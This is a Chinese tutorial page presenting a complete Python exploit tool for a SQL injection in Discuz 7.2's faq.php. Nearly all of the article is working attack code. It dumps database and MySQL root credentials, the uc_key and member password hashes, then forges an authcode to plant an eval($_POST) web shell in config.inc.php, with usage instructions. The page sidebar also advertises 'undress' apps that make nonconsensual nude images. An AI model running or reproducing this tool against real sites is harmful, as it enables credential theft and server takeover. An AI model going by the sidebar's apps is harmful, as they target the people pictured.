Python写的Discuz7.2版faq.php注入漏洞工具-Python Tutorial-php.cn

Home

Backend Development

Python Tutorial

Python写的Discuz7.2版faq.php注入漏洞工具

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB

Jun 06, 2016 am 11:32 AM

pythoninjection

Discuz 7.2 faq.php全自动利用工具,getshell 以及dump数据，python 版的uc_key getshell部分的代码来自网上(感谢作者)

实现代码:

#!/usr/bin/env python
# -*- coding: gbk -*-
# -*- coding: gb2312 -*-
# -*- coding: utf_8 -*- 
# author iswin 
import sys
import hashlib
import time
import math
import base64
import urllib2 
import urllib
import re

def sendRequest(url,para):
	try:
		data = urllib.urlencode(para)
		req=urllib2.Request(url,data)
		res=urllib2.urlopen(req,timeout=20).read()
	except Exception, e:
		print 'Exploit Failed!\n%s'%(e)
		exit(0);
	return res

def getTablePrefix(url):
	print 'Start GetTablePrefix...'
	para={'action':'grouppermission','gids[99]':'\'','gids[100][0]':') and (select 1 from (select count(*),concat((select hex(TABLE_NAME) from INFORMATION_SCHEMA.TABLES where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#'}
	res=sendRequest(url,para);
	pre=re.findall("Duplicate entry '(.*&#63;)'",res);
	if len(pre)==0:
		print 'Exploit Failed!'
		exit(0);
	table_pre=pre[0][:len(pre[0])-1].decode('hex')
	table_pre=table_pre[0:table_pre.index('_')]
	print 'Table_pre:%s'%(table_pre)
	return table_pre

def getCurrentUser(url):
	para={'action':'grouppermission','gids[99]':'\'','gids[100][0]':') and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a)#'}
	res=sendRequest(url,para)
	pre=re.findall("Duplicate entry '(.*&#63;)'",res)
	if len(pre)==0:
		print 'Exploit Failed!'
		exit(0);
	table_pre=pre[0][:len(pre[0])-1]
	print 'Current User:%s'%(table_pre)
	return table_pre

def getUcKey(url):
	para={'action':'grouppermission','gids[99]':'\'','gids[100][0]':') and (select 1 from (select count(*),concat((select substr(authkey,1,62) from cdb_uc_applications limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#'}
	para1={'action':'grouppermission','gids[99]':'\'','gids[100][0]':') and (select 1 from (select count(*),concat((select substr(authkey,63,2) from cdb_uc_applications limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#'}
	res=sendRequest(url,para);
	res1=sendRequest(url,para1);
	key1=re.findall("Duplicate entry '(.*&#63;)'",res)
	key2=re.findall("Duplicate entry '(.*&#63;)'",res1)
	if len(key1)==0:
		print 'Get Uc_Key Failed!'
		return ''
	key=key1[0][:len(key1[0])-1]+key2[0][:len(key2[0])-1]
	print 'uc_key:%s'%(key)
	return key

def getRootUser(url):
	para={'action':'grouppermission','gids[99]':'\'','gids[100][0]':') and (select 1 from (select count(*),concat((select concat(user,0x20,password) from mysql.user limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#'}
	res=sendRequest(url,para);
	pre=re.findall("Duplicate entry '(.*&#63;)'",res)
	if len(pre)==0:
		print 'Exploit Failed!'
		exit(0);
	table_pre=pre[0][:len(pre[0])-1].split(' ')
	print 'root info:\nuser:%s password:%s'%(table_pre[0],table_pre[1])

def dumpData(url,table_prefix,count):
	para={'action':'grouppermission','gids[99]':'\'','gids[100][0]':') and (select 1 from (select count(*),concat((select concat(username,0x20,password) from %s_members limit %d,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#'%(table_prefix,count)}
	res=sendRequest(url,para);
	datas=re.findall("Duplicate entry '(.*&#63;)'",res)
	if len(datas)==0:
		print 'Exploit Failed!'
		exit(0)
	cleandata=datas[0][:len(datas[0])-1]
	info=cleandata.split(' ')
	print 'user:%s pass:%s'%(info[0],info[1])

def microtime(get_as_float = False) :
  if get_as_float:
    return time.time()
  else:
    return '%.8f %d' % math.modf(time.time())
 
def get_authcode(string, key = ''):
  ckey_length = 4
  key = hashlib.md5(key).hexdigest()
  keya = hashlib.md5(key[0:16]).hexdigest()
  keyb = hashlib.md5(key[16:32]).hexdigest()
  keyc = (hashlib.md5(microtime()).hexdigest())[-ckey_length:]
  cryptkey = keya + hashlib.md5(keya+keyc).hexdigest() 
  key_length = len(cryptkey)
  string = '0000000000' + (hashlib.md5(string+keyb)).hexdigest()[0:16]+string
  string_length = len(string)
  result = ''
  box = range(0, 256)
  rndkey = dict()
  for i in range(0,256):
    rndkey[i] = ord(cryptkey[i % key_length])
  j=0
  for i in range(0,256):
    j = (j + box[i] + rndkey[i]) % 256
    tmp = box[i]
    box[i] = box[j]
    box[j] = tmp
  a=0
  j=0
  for i in range(0,string_length):
    a = (a + 1) % 256
    j = (j + box[a]) % 256
    tmp = box[a]
    box[a] = box[j]
    box[j] = tmp
    result += chr(ord(string[i]) ^ (box[(box[a] + box[j]) % 256]))
  return keyc + base64.b64encode(result).replace('=', '')
 
def get_shell(url,key,host):
  headers={'Accept-Language':'zh-cn',
  'Content-Type':'application/x-www-form-urlencoded',
  'User-Agent':'Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)',
  'Referer':url
  }
  tm = time.time()+10*3600
  tm="time=%d&action=updateapps" %tm
  code = urllib.quote(get_authcode(tm,key))
  url=url+"&#63;code="+code
  data1='''<&#63;xml version="1.0" encoding="ISO-8859-1"&#63;>
      <root>
      <item id="UC_API">http://xxx\');eval($_POST[3]);//</item>
      </root>'''
  try:
    req=urllib2.Request(url,data=data1,headers=headers)
    ret=urllib2.urlopen(req)
  except:
    return "Exploit Falied"
  data2='''<&#63;xml version="1.0" encoding="ISO-8859-1"&#63;>
      <root>
      <item id="UC_API">http://aaa</item>
      </root>'''
  try:
    req=urllib2.Request(url,data=data2,headers=headers)
    ret=urllib2.urlopen(req)
  except:
    return "error"

  try:
  	req=urllib2.Request(host+'/config.inc.php')
  	res=urllib2.urlopen(req,timeout=20).read()
  except Exception, e:
  	print 'GetWebshell Failed,%s'%(e)
   	return
  print "webshell:"+host+"/config.inc.php,password:3"

if __name__ == '__main__':
	print 'DZ7.x Exp Code By iswin'
	if len(sys.argv)<3:
		print 'DZ7.x Exp Code By iswin\nusage:python dz7.py http://www.bitsCN.com 10'
		exit(0)
	url=sys.argv[1]+'/faq.php'
	count=int(sys.argv[2])
	user=getCurrentUser(url)
	if user.startswith('root@'):
		getRootUser(url)
	uc_key=getUcKey(url)
	if len(uc_key)==64:
		print 'Start GetWebshell...'
		get_shell(sys.argv[1]+'/api/uc.php',uc_key,sys.argv[1])
	tb_pre=getTablePrefix(url)
	print 'Start DumpData...'
	for x in xrange(0,count):
		dumpData(url,tb_pre,x)

Statement

The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn

详细讲解Python之Seaborn（数据可视化）Apr 21, 2022 pm 06:08 PM

本篇文章给大家带来了关于Python的相关知识，其中主要介绍了关于Seaborn的相关问题，包括了数据可视化处理的散点图、折线图、条形图等等内容，下面一起来看一下，希望对大家有帮助。

详细了解Python进程池与进程锁May 10, 2022 pm 06:11 PM

本篇文章给大家带来了关于Python的相关知识，其中主要介绍了关于进程池与进程锁的相关问题，包括进程池的创建模块，进程池函数等等内容，下面一起来看一下，希望对大家有帮助。

Python自动化实践之筛选简历Jun 07, 2022 pm 06:59 PM

本篇文章给大家带来了关于Python的相关知识，其中主要介绍了关于简历筛选的相关问题，包括了定义 ReadDoc 类用以读取 word 文件以及定义 search_word 函数用以筛选的相关内容，下面一起来看一下，希望对大家有帮助。

归纳总结Python标准库May 03, 2022 am 09:00 AM

本篇文章给大家带来了关于Python的相关知识，其中主要介绍了关于标准库总结的相关问题，下面一起来看一下，希望对大家有帮助。

Python数据类型详解之字符串、数字Apr 27, 2022 pm 07:27 PM

本篇文章给大家带来了关于Python的相关知识，其中主要介绍了关于数据类型之字符串、数字的相关问题，下面一起来看一下，希望对大家有帮助。

分享10款高效的VSCode插件，总有一款能够惊艳到你！！Mar 09, 2021 am 10:15 AM

VS Code的确是一款非常热门、有强大用户基础的一款开发工具。本文给大家介绍一下10款高效、好用的插件，能够让原本单薄的VS Code如虎添翼，开发效率顿时提升到一个新的阶段。

详细介绍python的numpy模块May 19, 2022 am 11:43 AM

本篇文章给大家带来了关于Python的相关知识，其中主要介绍了关于numpy模块的相关问题，Numpy是Numerical Python extensions的缩写，字面意思是Python数值计算扩展，下面一起来看一下，希望对大家有帮助。

python中文是什么意思Jun 24, 2019 pm 02:22 PM

pythn的中文意思是巨蟒、蟒蛇。1989年圣诞节期间，Guido van Rossum在家闲的没事干，为了跟朋友庆祝圣诞节，决定发明一种全新的脚本语言。他很喜欢一个肥皂剧叫Monty Python，所以便把这门语言叫做python。

See all articles

Hot AI Tools

Undresser.AI Undress

AI-powered app for creating realistic nude photos

AI Clothes Remover

Online AI tool for removing clothes from photos.

Undress AI Tool

Undress images for free

Clothoff.io

AI clothes remover

AI Hentai Generator

Generate AI Hentai for free.

Hot Article

R.E.P.O. Energy Crystals Explained and What They Do (Yellow Crystal)

2 weeks agoBy尊渡假赌尊渡假赌尊渡假赌

How Long Does It Take To Beat Split Fiction?

4 weeks agoByDDD

R.E.P.O. Save File Location: Where Is It & How to Protect It?

1 months agoByDDD

R.E.P.O. Best Graphic Settings

2 weeks agoBy尊渡假赌尊渡假赌尊渡假赌

Assassin's Creed Shadows: Seashell Riddle Solution

1 weeks agoByDDD

Hot Tools

mPDF

mPDF is a PHP library that can generate PDF files from UTF-8 encoded HTML. The original author, Ian Back, wrote mPDF to output PDF files "on the fly" from his website and handle different languages. It is slower than original scripts like HTML2FPDF and produces larger files when using Unicode fonts, but supports CSS styles etc. and has a lot of enhancements. Supports almost all languages, including RTL (Arabic and Hebrew) and CJK (Chinese, Japanese and Korean). Supports nested block-level elements (such as P, DIV),

MantisBT

Mantis is an easy-to-deploy web-based defect tracking tool designed to aid in product defect tracking. It requires PHP, MySQL and a web server. Check out our demo and hosting services.

SAP NetWeaver Server Adapter for Eclipse

Integrate Eclipse with SAP NetWeaver application server.

Atom editor mac version download

The most popular open source editor

MinGW - Minimalist GNU for Windows

This project is in the process of being migrated to osdn.net/projects/mingw, you can continue to follow us there. MinGW: A native Windows port of the GNU Compiler Collection (GCC), freely distributable import libraries and header files for building native Windows applications; includes extensions to the MSVC runtime to support C99 functionality. All MinGW software can run on 64-bit Windows platforms.

Hot Topics

Where is the login entrance for gmail email?

7386

1630

1357

1267

1216